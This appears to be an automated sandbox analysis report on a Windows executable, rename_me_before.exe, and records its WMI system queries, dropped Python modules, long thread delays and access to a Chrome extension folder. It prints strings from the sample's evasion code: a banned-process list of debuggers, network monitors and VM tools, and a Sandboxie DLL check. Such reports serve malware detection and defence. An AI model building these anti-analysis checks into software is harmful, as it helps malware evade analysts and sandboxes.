            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
            Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Caption, Description, ProviderName FROM Win32_LogicalDisk
            Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Caption, Command FROM Win32_StartupCommand
            Source: rename_me_before.exe, 00000001.00000002.1980340485.000001B103050000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXE
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: QEMU-GA.EXE
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "QEMU-GA.EXE"
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "PROCESSHACKER.EXE"0A!
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: VMUSRVC.EXEPF!
            Source: rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELF.BANNED_PROCESS = ["HTTP TOOLKIT.EXE", "HTTPDEBUGGERUI.EXE","WIRESHARK.EXE", "FIDDLER.EXE", "REGEDIT.EXE", "TASKMGR.EXE", "VBOXSERVICE.EXE", "DF5SERV.EXE", "PROCESSHACKER.EXE", "VBOXTRAY.EXE", "VMTOOLSD.EXE", "VMWARETRAY.EXE", "IDA64.EXE", "OLLYDBG.EXE",
            Source: rename_me_before.exe, 00000001.00000002.1978432003.000001B101520000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _PROCESS = ["HTTP TOOLKIT.EXE", "HTTPDEBUGGERUI.EXE","WIRESHARK.EXE", "FIDDLER.EXE", "REGEDIT.EXE", "TASKMGR.EXE", "VBOXSERVICE.EXE", "DF5SERV.EXE", "PROCESSHACKER.EXE", "VBOXTRAY.EXE", "VMTOOLSD.EXE", "VMWARETRAY.EXE", "IDA64.EXE", "OLLYDBG.EXE",
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "SBIEDLL.DLL"
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "VMUSRVC.EXE"
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "XENSERVICE.EXE"
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: XENSERVICE.EXE0G!
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "VMUSRVC.EXE"0
            Source: rename_me_before.exe, 00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978432003.000001B101520000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949949259.000001B1021E3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "XENSERVICE.EXE", # XEN
            Source: rename_me_before.exe, 00000001.00000003.1948127865.000001B1028B9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "HTTPDEBUGGERUI.EXE","WIRESHARK.EXE", "
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: FIDDLER.EXE0
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OLLYDBG.EXE
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: VMUSRVC.EXE
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "XENSERVICE.EXE"PN!
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "WIRESHARK.EXE"
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "PROCESSHACKER.EXE"
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL0Z!
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "XENSERVICE.EXE"PV!
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: FIDDLER.EXE
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "OLLYDBG.EXE"
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "FIDDLER.EXE"
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: XENSERVICE.EXE
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "SBIEDLL.DLL"0
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
            Source: rename_me_before.exe, 00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978432003.000001B101520000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949949259.000001B1021E3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HANDLE = CTYPES.WINDLL.LOADLIBRARY("SBIEDLL.DLL")
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2622
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 573
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3589
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3101
            Source: C:\Users\user\Desktop\rename_me_before.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\frozenlist\_frozenlist.cp311-win_amd64.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\_uuid.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\_bz2.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp\_websocket.cp311-win_amd64.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\_socket.pyd
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.dll
            Source: C:\Users\user\Desktop\rename_me_before.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\_queue.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\_overlapped.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\pyexpat.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\_cffi_backend.cp311-win_amd64.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp\_http_parser.cp311-win_amd64.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\python3.dll
            Source: C:\Users\user\Desktop\rename_me_before.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\_lzma.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\unicodedata.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp\_helpers.cp311-win_amd64.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\_hashlib.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\python311.dll
            Source: C:\Users\user\Desktop\rename_me_before.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\_multiprocessing.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\multidict\_multidict.cp311-win_amd64.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\cryptography\hazmat\bindings\_rust.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\select.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\_ssl.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp\_http_writer.cp311-win_amd64.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\yarl\_quoting_c.cp311-win_amd64.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\_decimal.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\_sqlite3.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\_asyncio.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI13962\_ctypes.pyd
            Source: C:\Users\user\Desktop\rename_me_before.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes | graph_0-17045
            Source: C:\Users\user\Desktop\rename_me_before.exe | API coverage: 7.8 %
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7416 | Thread sleep count: 2622 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7420 | Thread sleep count: 573 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7596 | Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7252 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 7648 | Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7380 | Thread sleep count: 3589 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7380 | Thread sleep count: 3101 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7316 | Thread sleep time: -8301034833169293s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7372 | Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
            Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
            Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
            Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
            Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
            Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
            Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
            Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: C:\Users\user\Desktop\rename_me_before.exe | Code function: 0_2_00007FF6404E79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF6404E79B0
            Source: C:\Users\user\Desktop\rename_me_before.exe | Code function: 0_2_00007FF6404E85A0 FindFirstFileExW,FindClose,0_2_00007FF6404E85A0
            Source: C:\Users\user\Desktop\rename_me_before.exe | Code function: 0_2_00007FF640500B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF640500B84
            Source: C:\Users\user\Desktop\rename_me_before.exe | Code function: 1_2_00007FF6404E85A0 FindFirstFileExW,FindClose,1_2_00007FF6404E85A0
            Source: C:\Users\user\Desktop\rename_me_before.exe | Code function: 1_2_00007FF6404E79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF6404E79B0
            Source: C:\Users\user\Desktop\rename_me_before.exe | Code function: 1_2_00007FF640500B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF640500B84
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images
            Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0
            Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales
            Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css
            Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html
            Source: C:\Users\user\Desktop\rename_me_before.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: "vmwareuser.exe"
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: VMware
            Source: rename_me_before.exe, 00000001.00000002.1979075425.000001B101E80000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: Hyper-V
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: "vboxservice.exe"0V!
            Source: rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: "vmwaretray.exe", # VMware
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmusrvc.exe
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmsrvc.exepW!
            Source: rename_me_before.exe, 00000001.00000003.1966603181.000001B103364000.00000004.00000020.00020000.00000000.sdmp, net1.exe, 00000030.00000002.1767121596.00000228A90E8000.00000004.00000020.00020000.00000000.sdmp, system_info.txt.1.dr | Binary or memory string: *Hyper-V Administrators
            Source: rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: "vboxservice.exe", # VirtualBox
